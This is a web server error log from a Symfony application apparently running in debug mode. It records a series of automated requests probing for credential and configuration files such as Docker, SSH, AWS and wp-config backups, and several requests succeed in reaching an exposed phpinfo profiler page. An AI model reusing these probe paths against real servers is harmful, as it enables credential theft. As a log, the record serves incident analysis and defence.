[2025-12-20 19:55:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.docker/config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.docker/config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 19:55:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.drone.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.drone.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 19:55:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.jaynes.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.jaynes.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 19:55:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.lakectl.yaml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.lakectl.yaml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 19:55:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.local"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.local\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 19:55:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.production"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.production\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 19:55:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 19:55:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.remote"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.remote\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 19:55:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.ssh/sftp-config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.ssh/sftp-config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 19:55:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.sync.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.sync.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 19:56:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.travis.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.travis.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 19:56:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.vscode/settings.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.vscode/settings.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 19:56:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.vscode/sftp.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.vscode/sftp.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 19:56:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.wp-config.php.swp"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.wp-config.php.swp\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 19:56:40] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?phpinfo=1","method":"GET"} []
[2025-12-20 19:57:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /AWS/AWSDetails.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /AWS/AWSDetails.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 19:58:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /AWSCredentials.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /AWSCredentials.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 19:58:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /AWSDetails.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /AWSDetails.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 19:58:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /Client/netlify.toml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /Client/netlify.toml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 19:58:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /Cloud.md"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /Cloud.md\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 19:58:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /DOCS.md"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /DOCS.md\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 19:58:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /Docker.md"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /Docker.md\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 19:58:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /IAM.md"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /IAM.md\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 19:58:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /LOG.md"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /LOG.md\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 19:58:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /NOTES.md"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /NOTES.md\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 19:58:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /Properties/launchSettings.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /Properties/launchSettings.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 19:59:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /README.md"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /README.md\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 19:59:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /SendMail.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /SendMail.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 19:59:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_config.rb.erb"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_config.rb.erb\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 19:59:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_config.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_config.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 19:59:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_config_base.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_config_base.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 19:59:22] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://auth.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-20 19:59:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /admin/config_pro.toml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /admin/config_pro.toml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:01:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ansible/aws/inventory/ec2.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ansible/aws/inventory/ec2.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:01:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/aws/s3.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/aws/s3.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:01:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/config.ino"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/config.ino\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:01:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a26a5e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a26a5e?panel=request","method":"GET"} []
[2025-12-20 20:01:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-20 20:03:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/model/config.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/model/config.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:04:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/settings.py"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/settings.py\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:04:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api_gateway/conf/pay.toml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api_gateway/conf/pay.toml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:04:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app-config.local.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app-config.local.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:04:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.py"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.py\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:04:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.toml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.toml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:04:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.yaml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.yaml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:04:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/.secrets"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/.secrets\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
